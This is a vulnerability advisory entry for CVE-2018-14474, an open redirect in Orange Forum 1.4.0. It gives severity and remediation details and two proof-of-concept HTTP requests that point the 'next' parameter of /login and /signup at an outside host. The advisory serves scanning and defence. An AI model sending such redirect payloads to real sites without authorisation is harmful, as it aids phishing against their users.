| Title | Orange Forum 1.4.0 - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. |
| Remediation | Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.02192 |
| CVE ID | CVE-2018-14474 |
| CWE ID | CWE-601 |
| Tags | cve2018 cve redirect orangeforum oss seclists goodoldweb vuln |
Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
GET /login?next=http://interact.sh/?app.scan/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.11
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /signup?next=http://interact.sh/?app.scan/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-14474.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-14474.pcap
N/AN/A